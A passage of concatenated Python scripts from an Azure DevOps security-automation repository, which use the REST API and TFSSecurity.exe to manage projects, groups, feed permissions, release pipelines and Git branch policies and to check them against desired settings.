print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName, ARGS.feedId
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()
ACCESS_DICT = CURRENT_ACL["value"][0]
ACE = {
"role": f"{ARGS.role}",
"identityDescriptor": f"Microsoft.TeamFoundation.Identity;{SID}",
"displayName": "None",
"isInheritedRole": "False",
}
DESIRED_ACL = [ACE]
print(f"[INFO] Setting permissions for {ARGS.groupName} group..")
try:
RESPONSE = requests.patch(
URL, headers=HEADERS, data=json.dumps(DESIRED_ACL), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 200:
print(
f"[INFO] Permissions for {ARGS.groupName} group have been set successfully"
)
else:
print(
f"##vso[task.logissue type=error] Permissions for {ARGS.groupName} group have not been set successfully"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | onprem/get_group_members.py | <filename>onprem/get_group_members.py
"""
This script gets current quantity of group members and compares it with desired
"""
import subprocess
import argparse
import sys
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--desiredMembersQuantity", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/imx",
f"[{ARGS.projectName}]\\{ARGS.groupName}",
f"/collection:{ARGS.organization}",
]
CURRENT_MEMBERS_OUTPUT = subprocess.run(
CMD, check=True, stdout=subprocess.PIPE
).stdout.decode("utf-8")
CURRENT_MEMBERS_LINE = ""
for LINE in CURRENT_MEMBERS_OUTPUT.splitlines():
if "member(s):" in LINE:
CURRENT_MEMBERS_LINE = LINE
break
if CURRENT_MEMBERS_LINE == "":
CURRENT_MEMBERS_QUANTITY = "0"
else:
CURRENT_MEMBERS_QUANTITY = CURRENT_MEMBERS_LINE.split(" ")[0]
print(f"[DEBUG] CURRENT_MEMBERS_QUANTITY: {CURRENT_MEMBERS_QUANTITY}")
if int(CURRENT_MEMBERS_QUANTITY) == int(ARGS.desiredMembersQuantity):
print("[INFO] Current members quantity match desired")
else:
print(
"##vso[task.logissue type=error] Current members quantity does not match desired"
)
print(
f"##vso[task.logissue type=error] Desired members quantity = {ARGS.desiredMembersQuantity}"
)
print(
f"##vso[task.logissue type=error] Current members quantity = {CURRENT_MEMBERS_QUANTITY}"
)
print(f"##vso[task.logissue type=error] Current members = {CURRENT_MEMBERS_OUTPUT}")
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/create_tmp_release_pipeline.py | """
This script creates temporary Release pipeline
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print("[INFO] Creating tmp Release pipeline..")
URL = "{}/{}/_apis/release/definitions?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
"source": "undefined",
"revision": 1,
"description": "null",
"createdBy": "null",
"createdOn": "0001-01-01T00:00:00",
"modifiedBy": "null",
"modifiedOn": "0001-01-01T00:00:00",
"isDeleted": "false",
"variables": {},
"variableGroups": [],
"environments": [
{
"id": 0,
"name": "Stage 1",
"rank": 1,
"variables": {},
"variableGroups": [],
"preDeployApprovals": {
"approvals": [
{
"rank": 1,
"isAutomated": "true",
"isNotificationOn": "false",
"id": 1,
}
],
"approvalOptions": {
"requiredApproverCount": "null",
"releaseCreatorCanBeApprover": "false",
"autoTriggeredAndPreviousEnvironmentApprovedCanBeSkipped": "false",
"enforceIdentityRevalidation": "false",
"timeoutInMinutes": 0,
"executionOrder": "beforeGates",
},
},
"deployStep": {"id": 2},
"postDeployApprovals": {
"approvals": [
{
"rank": 1,
"isAutomated": "true",
"isNotificationOn": "false",
"id": 3,
}
],
"approvalOptions": {
"requiredApproverCount": "null",
"releaseCreatorCanBeApprover": "false",
"autoTriggeredAndPreviousEnvironmentApprovedCanBeSkipped": "false",
"enforceIdentityRevalidation": "false",
"timeoutInMinutes": 0,
"executionOrder": "afterSuccessfulGates",
},
},
"deployPhases": [
{
"deploymentInput": {
"parallelExecution": {"parallelExecutionType": "none"},
"timeoutInMinutes": 0,
"jobCancelTimeoutInMinutes": 1,
"condition": "succeeded()",
"overrideInputs": {},
},
"rank": 1,
"phaseType": "runOnServer",
"name": "Agentless job",
"refName": "null",
"workflowTasks": [],
}
],
"environmentOptions": {
"emailNotificationType": "OnlyOnFailure",
"emailRecipients": "release.environment.owner;release.creator",
"skipArtifactsDownload": "false",
"timeoutInMinutes": 0,
"enableAccessToken": "false",
"publishDeploymentStatus": "true",
"badgeEnabled": "false",
"autoLinkWorkItems": "false",
"pullRequestDeploymentEnabled": "false",
},
"demands": [],
"conditions": [
{"name": "ReleaseStarted", "conditionType": "event", "value": ""}
],
"executionPolicy": {"concurrencyCount": 1, "queueDepthCount": 0},
"schedules": [],
"retentionPolicy": {
"daysToKeep": 30,
"releasesToKeep": 3,
"retainBuild": "true",
},
"processParameters": {},
"properties": {
"BoardsEnvironmentType": {
"$type": "System.String",
"$value": "unmapped",
},
"LinkBoardsWorkItems": {"$type": "System.String", "$value": "False"},
},
"preDeploymentGates": {"id": 0, "gatesOptions": "null", "gates": []},
"postDeploymentGates": {"id": 0, "gatesOptions": "null", "gates": []},
"environmentTriggers": [],
}
],
"artifacts": [],
"triggers": [],
"releaseNameFormat": "Release-$(rev:r)",
"tags": [],
"properties": {
"DefinitionCreationSource": {"$type": "System.String", "$value": "ReleaseNew"},
"IntegrateBoardsWorkItems": {"$type": "System.String", "$value": "False"},
"IntegrateJiraWorkItems": {"$type": "System.String", "$value": "false"},
},
"name": "tmp",
"path": "\\",
"projectReference": "null",
"_links": {},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 200:
print("[INFO] tmp Release pipeline has been created successfully")
else:
print(
"##vso[task.logissue type=error] tmp Release pipeline has not been created"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/delete_tmp_release_pipeline.py | <reponame>kagarlickij/azuredevops-security-automation
"""
This script deletes temporary Release pipeline
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print("[INFO] Deleting tmp Release pipeline..")
URL = "{}/{}/_apis/release/definitions/1?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.delete(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print("[INFO] tmp Release pipeline has been deleted successfully")
else:
print(
"##vso[task.logissue type=error] tmp Release pipeline has not been deleted"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | onprem/get_groups.py | <gh_stars>1-10
"""
This script gets list of current groups and compares it with list of desired groups
"""
import subprocess
import argparse
import sys
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--desiredGroupsList", nargs="+", required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/g",
f"vstfs:///Classification/TeamProject/{ARGS.projectId}",
f"/collection:{ARGS.organization}",
]
LIST_GROUPS_OUTPUT = subprocess.run(
CMD, check=True, stdout=subprocess.PIPE
).stdout.decode("utf-8")
CURRENT_GROUPS_LIST = list()
for LINE in LIST_GROUPS_OUTPUT.splitlines():
if "Display name" in LINE:
GROUP_NAME = LINE.split("\\")[1]
CURRENT_GROUPS_LIST.append(GROUP_NAME)
print(f"[DEBUG] CURRENT_GROUPS_LIST: {CURRENT_GROUPS_LIST}")
DESIRED_GROUPS_LIST = ARGS.desiredGroupsList
DESIRED_GROUPS_LIST.sort()
CURRENT_GROUPS_LIST.sort()
if CURRENT_GROUPS_LIST == DESIRED_GROUPS_LIST:
print("[INFO] Current list of groups match desired")
else:
print(
"##vso[task.logissue type=error] Current list of groups does not match desired"
)
print(f"##vso[task.logissue type=error] currentGroupsList = {CURRENT_GROUPS_LIST}")
print(f"##vso[task.logissue type=error] desiredGroupsList = {DESIRED_GROUPS_LIST}")
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | onprem/delete_group.py | <reponame>kagarlickij/azuredevops-security-automation<gh_stars>1-10
"""
This script deletes group in projct via TFSSecurity cmd
"""
import subprocess
import argparse
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/gd",
f"[{ARGS.projectName}]\\{ARGS.groupName}",
f"/collection:{ARGS.organization}",
]
DELETE_OUTPUT = subprocess.run(CMD, check=True, stdout=subprocess.PIPE).stdout.decode(
"utf-8"
)
print(f"[DEBUG] DELETE_OUTPUT: {DELETE_OUTPUT}")
|
kagarlickij/azuredevops-security-automation | cloud/get_groups.py | <reponame>kagarlickij/azuredevops-security-automation<filename>cloud/get_groups.py
"""
This script gets list of current groups and compares it with list of desired groups
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--desiredGroupsList", nargs="+", required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
DESIRED_GROUPS_LIST = ARGS.desiredGroupsList
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_GROUPS_LIST = []
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
groupDisplayName = GROUP["displayName"]
CURRENT_GROUPS_LIST.append(groupDisplayName)
DESIRED_GROUPS_LIST.sort()
CURRENT_GROUPS_LIST.sort()
if CURRENT_GROUPS_LIST == DESIRED_GROUPS_LIST:
print("[INFO] Current list of groups match desired")
else:
print(
"##vso[task.logissue type=error] Current list of groups does not match desired"
)
print(
f"##vso[task.logissue type=error] currentGroupsList = {CURRENT_GROUPS_LIST}"
)
print(
f"##vso[task.logissue type=error] desiredGroupsList = {DESIRED_GROUPS_LIST}"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/check_feed_permissions.py | <gh_stars>1-10
"""
This script gets current ACL of the Artifact feed and compares it with desired
"""
import json
import argparse
import sys
import os
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedId", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--role", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
SID = os.environ[(ARGS.groupSid).upper()]
DESCRIPTOR = f"Microsoft.TeamFoundation.Identity;{SID}"
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.feedId
)
else:
print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName, ARGS.feedId
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()["value"]
for IDENTITY in CURRENT_ACL:
if IDENTITY["identityDescriptor"] == DESCRIPTOR:
CURRENT_ROLE = IDENTITY["role"]
break
try:
CURRENT_ROLE
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group permissions..")
if CURRENT_ROLE == ARGS.role:
print("[INFO] Current permissions match desired")
else:
print(
"##vso[task.logissue type=error] Current permissions do not match desired"
)
print(f"##vso[task.logissue type=error] Desired permissions = {ARGS.role}")
print(
f"##vso[task.logissue type=error] Current permissions = {CURRENT_ROLE}"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/create_project.py | """
This script creates new Azure DevOps project
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--projectDescription", type=str, required=False)
PARSER.add_argument(
"--processTemplate", type=str, default="6b724908-ef14-45cf-84f8-768b5384da45"
)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/projects?api-version=5.0".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECTS = RESPONSE.json()["value"]
for PROJECT in PROJECTS:
if PROJECT["name"] == ARGS.projectName:
print(
f"##vso[task.logissue type=error] project {ARGS.projectName} already exists"
)
sys.exit(1)
print(f"[INFO] project {ARGS.projectName} does not exist yet, ok to proceed")
print(f"[INFO] Creating {ARGS.projectName} project..")
URL = "{}/_apis/projects?api-version=5.0".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
"name": f"{ARGS.projectName}",
"description": f"{ARGS.projectDescription}",
"visibility": "private",
"capabilities": {
"versioncontrol": {"sourceControlType": "Git"},
"processTemplate": {"templateTypeId": f"{ARGS.processTemplate}"},
},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 202:
print(f"[INFO] Project {ARGS.projectName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Project {ARGS.projectName} has not been created"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/set_git_policy.py | <filename>common/set_git_policy.py
"""
This script sets cross-repo Git policy
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--minApproverCount", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/{}/_apis/policy/configurations?api-version=5.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
NULL = None
DATA = {
"isEnabled": "true",
"isBlocking": "true",
"type": {"id": "fa4e907d-c16b-4a4c-9dfa-4906e5d171dd"},
"settings": {
"minimumApproverCount": f"{ARGS.minApproverCount}",
"creatorVoteCounts": "false",
"scope": [
{"refName": "refs/heads/master", "matchKind": "exact", "repositoryId": NULL}
],
},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
print("[INFO] Cross-repo Git policy has been set successfully")
|
kagarlickij/azuredevops-security-automation | cloud/create_group.py | <gh_stars>1-10
"""
This script creates group in projct via Azure DevOps API
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupDescription", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print(f"[INFO] Creating {ARGS.groupName} group..")
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {"displayName": f"{ARGS.groupName}", "description": f"{ARGS.groupDescription}"}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 201:
print(f"[INFO] Group {ARGS.groupName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Group {ARGS.groupName} has not been created"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | cloud/export_group_info.py | """
This script gets and exports SID of the Azure DevOps group
"""
import json
import argparse
import sys
import base64
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_DESCRIPTOR = GROUP["descriptor"]
break
try:
GROUP_DESCRIPTOR
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group..")
DESCRIPTOR = GROUP_DESCRIPTOR.split("vssgp.", 1)[1]
for SYM in DESCRIPTOR.split("."):
SID = base64.b64decode(SYM + "=" * (-len(SYM) % 4)).decode("utf-8")
print(f"[INFO] Group {ARGS.groupName} SID = {SID}")
print(f"##vso[task.setvariable variable={ARGS.groupSid}]{SID}")
|
kagarlickij/azuredevops-security-automation | cloud/delete_group.py | <gh_stars>1-10
"""
This script deletes group in projct via Azure DevOps API
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
if GROUP["displayName"] == ARGS.groupName:
GROUP_DESCRIPTOR = GROUP["descriptor"]
break
try:
GROUP_DESCRIPTOR
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Deleting {ARGS.groupName} group..")
URL = "{}/_apis/graph/groups/{}?api-version=5.0-preview.1".format(
ARGS.organization, GROUP_DESCRIPTOR
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.delete(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print(f"[INFO] {ARGS.groupName} group has been deleted successfully")
else:
print(
f"##vso[task.logissue type=error] {ARGS.groupName} group has not been deleted successfully"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/export_feed_info.py | <filename>common/export_feed_info.py<gh_stars>1-10
"""
This script exports Feed ID
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
FEEDS = RESPONSE.json()["value"]
for FEED in FEEDS:
if FEED["name"] == ARGS.feedName:
FEED_ID = FEED["id"]
break
try:
FEED_ID
except NameError:
print(f"##vso[task.logissue type=error] Feed {ARGS.feedName} was not found")
sys.exit(1)
else:
print(f"[INFO] Feed {ARGS.feedName} ID = {FEED_ID}")
print(f"##vso[task.setvariable variable=feedId]{FEED_ID}")
|
kagarlickij/azuredevops-security-automation | common/check_git_policy.py | """
This script checks if all git repos in project follow best practices
"""
import json
import argparse
import sys
from datetime import date
from datetime import datetime
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--maxCommitAge", type=str, required=True)
PARSER.add_argument("--maxPullRequestAge", type=str, required=True)
PARSER.add_argument("--minApproverCount", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
HEADERS = {
"Content-Type": "application/json",
}
URL = "{}/{}/_apis/git/repositories?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
with open("./common/excluded_repos.txt") as text_file:
EXCLUDED_REPOS = text_file.read().splitlines()
print(f"[INFO] Excluded repos: {EXCLUDED_REPOS}")
ERROR_COUNTER = list()
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
REPOS = RESPONSE.json()["value"]
for REPO in REPOS:
REPO_NAME = {REPO["name"]}
print(f"\n[INFO] Checking {REPO_NAME} repo..")
REPO_ID = REPO["id"]
if REPO["name"] in EXCLUDED_REPOS:
print(f"[INFO] Repo {REPO_NAME} is excluded")
else:
DATE_FORMAT = "%Y-%m-%d"
URL = "{}/{}/_apis/git/repositories/{}/refs?api-version=5.0".format(
ARGS.organization, ARGS.projectName, REPO_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
BRANCHES = RESPONSE.json()["value"]
UNKNOWN_BRANCHES = list()
OUTDATED_BRANCHES = list()
OUTDATED_PRS = list()
for BRANCH in BRANCHES:
BRANCH_NAME = BRANCH["name"]
BRANCH_SHORTNAME = BRANCH_NAME.replace("refs/heads/", "")
if "feature/" in BRANCH_SHORTNAME or "bugfix/" in BRANCH_SHORTNAME:
URL = "{}/_apis/git/repositories/{}/commits?searchCriteria.itemVersion.version={}&api-version=5.0".format(
ARGS.organization, REPO_ID, BRANCH_SHORTNAME
)
try:
RESPONSE = requests.get(
URL, headers=HEADERS, auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(
f"##vso[task.logissue type=error] Response code: {CODE}"
)
print(
